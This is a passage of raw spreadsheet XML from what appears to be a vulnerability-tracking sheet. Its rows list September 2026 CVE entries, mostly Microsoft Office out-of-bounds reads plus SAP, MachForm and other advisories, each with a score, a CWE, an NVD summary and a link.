r="G1124" s="5" t="inlineStr" /><c r="H1124" s="5" t="n"><v>0.003</v></c><c r="I1124" s="5" t="inlineStr" /><c r="J1124" s="5" t="inlineStr" /><c r="K1124" s="5" t="inlineStr" /><c r="L1124" s="5" t="inlineStr" /><c r="M1124" s="5" t="inlineStr" /><c r="N1124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1124" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1124" s="5" t="inlineStr" /><c r="R1124" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1124" s="5" t="inlineStr"><is><t>ColdFusion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is></c><c r="T1124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76000</t></is></c></row><row r="1125"><c r="A1125" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1125" s="5" t="inlineStr"><is><t>CVE-2026-76968</t></is></c><c r="D1125" s="5" t="n"><v>6.5</v></c><c r="E1125" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1125" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1125" s="5" t="inlineStr" /><c r="H1125" s="5" t="n"><v>0.002</v></c><c r="I1125" s="5" t="inlineStr" /><c r="J1125" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1125" s="5" t="inlineStr" /><c r="L1125" s="5" t="inlineStr" /><c r="M1125" s="5" t="inlineStr" /><c r="N1125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1125" s="5" t="inlineStr" /><c r="R1125" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1125" s="5" t="inlineStr"><is><t>SAP Web Dispatcher, Internet Communication Manager and SAP Content Server allows an authenticated low-privileged attacker to access certain administrative functionality or interface and obtain sensitive information about the system state, resulting in information disclosure. This disclosed information could potentially be used to facilitate further attacks. This vulnerability has a high impact on the confidentiality of the application, with no impact on integrity or availability.</t></is></c><c r="T1125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t></is></c></row><row r="1126"><c r="A1126" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1126" s="5" t="inlineStr"><is><t>CVE-2026-76971</t></is></c><c r="D1126" s="5" t="n"><v>6.5</v></c><c r="E1126" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1126" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1126" s="5" t="inlineStr" /><c r="H1126" s="5" t="n"><v>0.001</v></c><c r="I1126" s="5" t="inlineStr" /><c r="J1126" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1126" s="5" t="inlineStr" /><c r="L1126" s="5" t="inlineStr" /><c r="M1126" s="5" t="inlineStr" /><c r="N1126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1126" s="5" t="inlineStr" /><c r="R1126" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1126" s="5" t="inlineStr"><is><t>Due to a Server-Side Request Forgery (SSRF) vulnerability in SAP Manufacturing Integration and Intelligence, an attacker could cause the server to initiate arbitrary outbound requests. If processed by the application, this behavior could be combined with XML/XSL processing to enable execution of scripts. Successful exploitation could result in a low impact on the confidentiality, integrity, and availability of the application.</t></is></c><c r="T1126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t></is></c></row><row r="1127"><c r="A1127" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1127" s="5" t="inlineStr"><is><t>CVE-2026-77896</t></is></c><c r="D1127" s="5" t="n"><v>6.5</v></c><c r="E1127" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1127" s="5" t="inlineStr" /><c r="H1127" s="5" t="n"><v>0.007</v></c><c r="I1127" s="5" t="inlineStr" /><c r="J1127" s="5" t="inlineStr" /><c r="K1127" s="5" t="inlineStr" /><c r="L1127" s="5" t="inlineStr" /><c r="M1127" s="5" t="inlineStr" /><c r="N1127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1127" s="5" t="inlineStr" /><c r="R1127" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1127" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Remote Desktop Client allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77896</t></is></c></row><row r="1128"><c r="A1128" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1128" s="5" t="inlineStr"><is><t>CVE-2026-77911</t></is></c><c r="D1128" s="5" t="n"><v>6.5</v></c><c r="E1128" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1128" s="5" t="inlineStr" /><c r="H1128" s="5" t="n"><v>0.007</v></c><c r="I1128" s="5" t="inlineStr" /><c r="J1128" s="5" t="inlineStr" /><c r="K1128" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1128" s="5" t="inlineStr" /><c r="M1128" s="5" t="inlineStr" /><c r="N1128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1128" s="5" t="inlineStr" /><c r="R1128" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1128" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t></is></c></row><row r="1129"><c r="A1129" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1129" s="5" t="inlineStr"><is><t>CVE-2026-78441</t></is></c><c r="D1129" s="5" t="n"><v>6.5</v></c><c r="E1129" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1129" s="5" t="inlineStr" /><c r="H1129" s="5" t="n"><v>0.007</v></c><c r="I1129" s="5" t="inlineStr" /><c r="J1129" s="5" t="inlineStr" /><c r="K1129" s="5" t="inlineStr" /><c r="L1129" s="5" t="inlineStr" /><c r="M1129" s="5" t="inlineStr" /><c r="N1129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1129" s="5" t="inlineStr" /><c r="R1129" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1129" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t></is></c></row><row r="1130"><c r="A1130" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1130" s="5" t="inlineStr"><is><t>CVE-2026-78453</t></is></c><c r="D1130" s="5" t="n"><v>6.5</v></c><c r="E1130" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1130" s="5" t="inlineStr" /><c r="H1130" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1130" s="5" t="inlineStr" /><c r="J1130" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K113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130" s="5" t="inlineStr" /><c r="M1130" s="5" t="inlineStr" /><c r="N1130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1130" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1130" s="5" t="inlineStr" /><c r="R1130" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1130" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t></is></c></row><row r="1131"><c r="A1131" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1131" s="5" t="inlineStr"><is><t>CVE-2026-78502</t></is></c><c r="D1131" s="5" t="n"><v>6.5</v></c><c r="E1131" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1131" s="5" t="inlineStr" /><c r="H1131" s="5" t="n"><v>0.007</v></c><c r="I1131" s="5" t="inlineStr" /><c r="J1131" s="5" t="inlineStr" /><c r="K1131" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1131" s="5" t="inlineStr" /><c r="M1131" s="5" t="inlineStr" /><c r="N1131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1131" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1131" s="5" t="inlineStr" /><c r="R1131" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1131" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t></is></c></row><row r="1132"><c r="A1132" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1132" s="5" t="inlineStr"><is><t>CVE-2026-78503</t></is></c><c r="D1132" s="5" t="n"><v>6.5</v></c><c r="E1132" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1132" s="5" t="inlineStr" /><c r="H1132" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1132" s="5" t="inlineStr" /><c r="J1132" s="5" t="inlineStr" /><c r="K1132" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1132" s="5" t="inlineStr" /><c r="M1132" s="5" t="inlineStr" /><c r="N1132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1132" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1132" s="5" t="inlineStr" /><c r="R1132" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1132" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t></is></c></row><row r="1133"><c r="A1133" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1133" s="5" t="inlineStr"><is><t>CVE-2026-78515</t></is></c><c r="D1133" s="5" t="n"><v>6.5</v></c><c r="E1133" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1133" s="5" t="inlineStr" /><c r="H1133" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1133" s="5" t="inlineStr" /><c r="J1133" s="5" t="inlineStr" /><c r="K1133" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1133" s="5" t="inlineStr" /><c r="M1133" s="5" t="inlineStr" /><c r="N1133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1133" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1133" s="5" t="inlineStr" /><c r="R1133" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1133" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t></is></c></row><row r="1134"><c r="A1134" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1134" s="5" t="inlineStr"><is><t>CVE-2026-78520</t></is></c><c r="D1134" s="5" t="n"><v>6.5</v></c><c r="E1134" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1134" s="5" t="inlineStr" /><c r="H1134" s="5" t="n"><v>0.007</v></c><c r="I1134" s="5" t="inlineStr" /><c r="J1134" s="5" t="inlineStr" /><c r="K1134" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1134" s="5" t="inlineStr" /><c r="M1134" s="5" t="inlineStr" /><c r="N1134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1134" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1134" s="5" t="inlineStr" /><c r="R1134" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1134" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t></is></c></row><row r="1135"><c r="A1135" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1135" s="5" t="inlineStr"><is><t>CVE-2026-78522</t></is></c><c r="D1135" s="5" t="n"><v>6.5</v></c><c r="E1135" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1135" s="5" t="inlineStr" /><c r="H1135" s="5" t="n"><v>0.007</v></c><c r="I1135" s="5" t="inlineStr" /><c r="J1135" s="5" t="inlineStr" /><c r="K1135" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1135" s="5" t="inlineStr" /><c r="M1135" s="5" t="inlineStr" /><c r="N1135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1135" s="5" t="inlineStr" /><c r="R1135" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1135" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t></is></c></row><row r="1136"><c r="A1136" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1136" s="5" t="inlineStr"><is><t>CVE-2026-78838</t></is></c><c r="D1136" s="5" t="n"><v>6.5</v></c><c r="E1136" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1136" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1136" s="5" t="inlineStr" /><c r="H1136" s="5" t="n"><v>0.004</v></c><c r="I1136" s="5" t="inlineStr" /><c r="J1136" s="5" t="inlineStr" /><c r="K1136" s="5" t="inlineStr" /><c r="L1136" s="5" t="inlineStr" /><c r="M1136" s="5" t="inlineStr" /><c r="N1136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1136" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1136" s="5" t="inlineStr" /><c r="R1136" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1136" s="5" t="inlineStr"><is><t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t></is></c><c r="T1136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t></is></c></row><row r="1137"><c r="A1137" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1137" s="5" t="inlineStr"><is><t>CVE-2026-79379</t></is></c><c r="D1137" s="5" t="n"><v>6.5</v></c><c r="E1137" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1137" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1137" s="5" t="inlineStr" /><c r="H1137" s="5" t="n"><v>0.003</v></c><c r="I1137" s="5" t="inlineStr" /><c r="J1137" s="5" t="inlineStr" /><c r="K1137" s="5" t="inlineStr" /><c r="L1137" s="5" t="inlineStr" /><c r="M1137" s="5" t="inlineStr" /><c r="N1137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1137" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1137" s="5" t="inlineStr" /><c r="R1137" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1137" s="5" t="inlineStr"><is><t>A buffer overflow in the SBC_DecodeFrames() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier and fixed in v.5.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted frame.</t></is></c><c r="T1137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79379</t></is></c></row><row r="1138"><c r="A1138" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1138" s="5" t="inlineStr"><is><t>CVE-2026-79573</t></is></c><c r="D1138" s="5" t="n"><v>6.5</v></c><c r="E1138" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1138" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1138" s="5" t="inlineStr" /><c r="H1138" s="5" t="n"><v>0.003</v></c><c r="I1138" s="5" t="inlineStr" /><c r="J1138" s="5" t="inlineStr" /><c r="K1138" s="5" t="inlineStr" /><c r="L1138" s="5" t="inlineStr" /><c r="M1138" s="5" t="inlineStr" /><c r="N1138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1138" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1138" s="5" t="inlineStr" /><c r="R1138" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1138" s="5" t="inlineStr"><is><t>L-ONE v1.0.0 was discovered to contain multiple SQL injection vulnerabilities in the /attachment/getBusinessUploadList component via the busid, id, and taskid parameters. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T1138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79573</t></is></c></row><row r="1139"><c r="A1139" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1139" s="5" t="inlineStr"><is><t>CVE-2026-80073</t></is></c><c r="D1139" s="5" t="n"><v>6.5</v></c><c r="E1139" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1139" s="5" t="inlineStr" /><c r="H1139" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1139" s="5" t="inlineStr" /><c r="J1139" s="5" t="inlineStr" /><c r="K1139" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L1139" s="5" t="inlineStr" /><c r="M1139" s="5" t="inlineStr" /><c r="N1139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1139" s="5" t="inlineStr" /><c r="R1139" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1139" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t></is></c></row><row r="1140"><c r="A1140" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1140" s="5" t="inlineStr"><is><t>CVE-2026-80076</t></is></c><c r="D1140" s="5" t="n"><v>6.5</v></c><c r="E1140" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1140" s="5" t="inlineStr" /><c r="H1140" s="5" t="n"><v>0.007</v></c><c r="I1140" s="5" t="inlineStr" /><c r="J1140" s="5" t="inlineStr" /><c r="K1140" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1140" s="5" t="inlineStr" /><c r="M1140" s="5" t="inlineStr" /><c r="N1140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1140" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1140" s="5" t="inlineStr" /><c r="R1140" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1140" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t></is></c></row><row r="1141"><c r="A1141" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1141" s="5" t="inlineStr"><is><t>CVE-2026-80078</t></is></c><c r="D1141" s="5" t="n"><v>6.5</v></c><c r="E1141" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1141" s="5" t="inlineStr" /><c r="H1141" s="5" t="n"><v>0.007</v></c><c r="I1141" s="5" t="inlineStr" /><c r="J1141" s="5" t="inlineStr" /><c r="K1141" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1141" s="5" t="inlineStr" /><c r="M1141" s="5" t="inlineStr" /><c r="N1141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1141" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1141" s="5" t="inlineStr" /><c r="R1141" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1141" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t></is></c></row><row r="1142"><c r="A1142" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1142" s="5" t="inlineStr"><is><t>CVE-2026-80079</t></is></c><c r="D1142" s="5" t="n"><v>6.5</v></c><c r="E1142" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1142" s="5" t="inlineStr" /><c r="H1142" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1142" s="5" t="inlineStr" /><c r="J1142" s="5" t="inlineStr" /><c r="K1142" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1142" s="5" t="inlineStr" /><c r="M1142" s="5" t="inlineStr" /><c r="N1142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1142" s="5" t="inlineStr" /><c r="R1142" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1142" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t></is></c></row><row r="1143"><c r="A1143" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1143" s="5" t="inlineStr"><is><t>CVE-2026-80082</t></is></c><c r="D1143" s="5" t="n"><v>6.5</v></c><c r="E1143" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1143" s="5" t="inlineStr" /><c r="H1143" s="5" t="n"><v>0.007</v></c><c r="I1143" s="5" t="inlineStr" /><c r="J1143" s="5" t="inlineStr" /><c r="K1143" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1143" s="5" t="inlineStr" /><c r="M1143" s="5" t="inlineStr" /><c r="N1143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1143" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1143" s="5" t="inlineStr" /><c r="R1143" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1143" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t></is></c></row><row r="1144"><c r="A1144" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1144" s="5" t="inlineStr"><is><t>CVE-2026-80084</t></is></c><c r="D1144" s="5" t="n"><v>6.5</v></c><c r="E1144" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1144" s="5" t="inlineStr" /><c r="H1144" s="5" t="n"><v>0.007</v></c><c r="I1144" s="5" t="inlineStr" /><c r="J1144" s="5" t="inlineStr" /><c r="K1144" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1144" s="5" t="inlineStr" /><c r="M1144" s="5" t="inlineStr" /><c r="N1144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1144" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1144" s="5" t="inlineStr" /><c r="R1144" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1144" s="5" 